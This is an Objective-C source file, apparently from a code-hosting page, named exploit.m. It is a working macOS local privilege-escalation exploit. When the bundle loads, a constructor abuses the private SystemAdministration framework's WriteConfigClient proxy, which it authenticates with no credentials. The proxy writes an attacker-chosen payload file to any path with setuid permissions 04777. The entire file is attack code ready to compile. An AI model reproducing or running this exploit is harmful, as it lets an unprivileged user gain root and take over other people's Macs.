34 lines
1.2 KiB
Objective-C
34 lines
1.2 KiB
Objective-C
// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
|
|
|
|
#include <dlfcn.h>
|
|
#include <objc/objc.h>
|
|
#include <objc/runtime.h>
|
|
#include <objc/message.h>
|
|
#include <Foundation/Foundation.h>
|
|
|
|
#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
|
|
#define FWK_BASE "/System/Library/Frameworks"
|
|
|
|
void __attribute__ ((constructor)) test(void)
|
|
{
|
|
void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
|
|
|
|
if (p != NULL)
|
|
{
|
|
id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
|
|
objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
|
|
id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
|
|
|
|
NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
|
|
NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
|
|
NSData* data = [NSData dataWithContentsOfFile:inpath];
|
|
|
|
objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
|
|
data,
|
|
outpath,
|
|
@{ NSFilePosixPermissions : @04777 });
|
|
}
|
|
|
|
exit(1);
|
|
}
|